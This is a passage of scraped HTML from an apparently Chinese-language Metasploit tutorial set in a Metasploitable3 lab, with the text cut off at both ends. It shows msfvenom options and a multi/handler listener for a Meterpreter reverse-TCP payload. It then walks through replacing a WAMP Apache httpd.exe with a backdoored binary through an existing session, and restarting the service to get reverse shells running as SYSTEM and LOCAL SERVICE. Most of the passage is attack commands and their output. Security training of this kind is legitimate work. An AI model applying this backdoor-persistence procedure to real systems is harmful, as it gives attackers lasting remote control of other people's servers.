class=\"hljs-keyword\">of<\/span> [length] size <span class=\"hljs-keyword\">on<\/span> <span class=\"hljs-keyword\">to<\/span> the payload<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-o &lt;opt&gt; The output <span class=\"hljs-keyword\">file<\/span> <span class=\"hljs-keyword\">name<\/span> (<span class=\"hljs-keyword\">otherwise<\/span> stdout)<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-p &lt;opt&gt; The <span class=\"hljs-keyword\">platform<\/span> <span class=\"hljs-keyword\">of<\/span> the payload<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-s &lt;opt&gt; NOP sled length.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-x &lt;opt&gt; Specify a custom executable <span class=\"hljs-keyword\">file<\/span> <span class=\"hljs-keyword\">to<\/span> use <span class=\"hljs-keyword\">as<\/span> a template<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<p>4\u3001\u542f\u52a8\u4e00\u4e2a\u76d1\u542c\uff0c\u76d1\u542c\u540e\u95e8\u7684\u53cd\u5411\u8fde\u63a5\uff0c\u5e76\u4f7f\u7528<code>expolit -j<\/code>\u653e\u5230\u540e\u53f0\u8fd0\u884c<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">payload(windows\/x64\/meterpreter\/reverse_tcp)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">exploit\/multi\/handler<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">payload<\/span> <span class=\"hljs-string\">windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">payload<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">-j<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Exploit<\/span> <span class=\"hljs-string\">running<\/span> <span class=\"hljs-string\">as<\/span> <span class=\"hljs-string\">background<\/span> <span class=\"hljs-string\">job<\/span> <span class=\"hljs-number\">0<\/span><span class=\"hljs-string\">.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Exploit<\/span> <span class=\"hljs-string\">completed,<\/span> <span class=\"hljs-string\">but<\/span> <span class=\"hljs-literal\">no<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-string\">was<\/span> <span class=\"hljs-string\">created.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>5\u3001\u5207\u56de\u4e4b\u524d\u7684<code>meterpreter session<\/code>\uff0c\u4e0a\u4f20\u540e\u95e8\u6587\u4ef6\u5e76\u91cd\u547d\u540d\u3002<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/handler) &gt; sessions -i <span class=\"hljs-number\">3<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Starting interaction with <span class=\"hljs-number\">3.<\/span>..<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">meterpreter &gt; cd <span class=\"hljs-attr\">C:<\/span>\\\\wamp\\\\bin\\\\apache\\\\apache2<span class=\"hljs-number\">.2<\/span><span class=\"hljs-number\">.21<\/span>\\\\bin\\\\<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">meterpreter &gt; mv httpd.exe httpd.exe.backup<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">meterpreter &gt; upload <span class=\"hljs-regexp\">\/root\/<\/span>httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-attr\">uploading :<\/span> <span class=\"hljs-regexp\">\/root\/<\/span>httpd-backdoored.exe -&gt; httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Uploaded <span class=\"hljs-number\">28.50<\/span> KiB of <span class=\"hljs-number\">28.50<\/span> KiB (<span class=\"hljs-number\">100.0<\/span>%): <span class=\"hljs-regexp\">\/root\/<\/span>httpd-backdoored.exe -&gt; httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-attr\">uploaded :<\/span> <span class=\"hljs-regexp\">\/root\/<\/span>httpd-backdoored.exe -&gt; httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">meterpreter &gt; mv httpd-backdoored.exe httpd.exe<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">meterpreter &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>6\u3001\u4f7f\u7528<code>shell<\/code>\u547d\u4ee4\u8fdb\u5165\u76ee\u6807\u7cfb\u7edf\u7684<code>shell<\/code>,\u91cd\u542f<code>wampapache<\/code>\u670d\u52a1\u3002<\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt; shell<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Process<\/span> <span class=\"hljs-string\">1976 created.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Channel<\/span> <span class=\"hljs-string\">3 created.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Microsoft<\/span> <span class=\"hljs-string\">Windows [Version 6.1.7601]<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Copyright<\/span> <span class=\"hljs-string\">(c) 2009 Microsoft Corporation. All rights reserved.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">C<\/span>:<span class=\"hljs-string\">\\wamp\\bin\\apache\\apache2.2.21\\bin&gt;net stop wampapache<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">net<\/span> <span class=\"hljs-string\">stop wampapache<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">The<\/span> <span class=\"hljs-string\">wampapache service is stopping.net sta<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">The<\/span> <span class=\"hljs-string\">wampapache service was stopped successfully.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">C<\/span>:<span class=\"hljs-string\">\\wamp\\bin\\apache\\apache2.2.21\\bin&gt;net start wampapache<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-meta\">[*]<\/span> <span class=\"hljs-string\">Sending stage (206403 bytes) to 192.168.177.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">net<\/span> <span class=\"hljs-string\">start wampapache<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">The<\/span> <span class=\"hljs-string\">wampapache service is starting.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">The<\/span> <span class=\"hljs-string\">wampapache service was started successfully.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<p>\u4f60\u4f1a\u53d1\u73b0\uff0c\u670d\u52a1\u542f\u52a8\u540e\uff0c\u8fd4\u56de\u4e86\u65b0\u7684\u4f1a\u8bdd<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">C:\\wamp\\bin\\apache\\apache2.2.21\\bin&gt;[*]<\/span> <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:63068)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-28 10:32:44<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(206403<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">5<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:63069)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-28 10:32:59<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">....<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sessions<\/span> <span class=\"hljs-string\">-l<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Active<\/span> <span class=\"hljs-string\">sessions<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">===============<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Id<\/span> <span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Type<\/span> <span class=\"hljs-string\">Information<\/span> <span class=\"hljs-string\">Connection<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">--<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----------<\/span> <span class=\"hljs-string\">----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">x86\/windows<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\SYSTEM<\/span> <span class=\"hljs-string\">@<\/span> <span class=\"hljs-string\">METASPLOITABLE3<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:62506<\/span> <span class=\"hljs-string\">(192.168.177.144)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">x64\/windows<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span> <span class=\"hljs-string\">@<\/span> <span class=\"hljs-string\">METASPLOITABLE3<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:63068<\/span> <span class=\"hljs-string\">(192.168.177.144)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">5<\/span> <span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">x64\/windows<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span> <span class=\"hljs-string\">@<\/span> <span class=\"hljs-string\">METASPLOITABLE3<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:63069<\/span> <span class=\"hljs-string\">(192.168.177.144)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/handler)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable 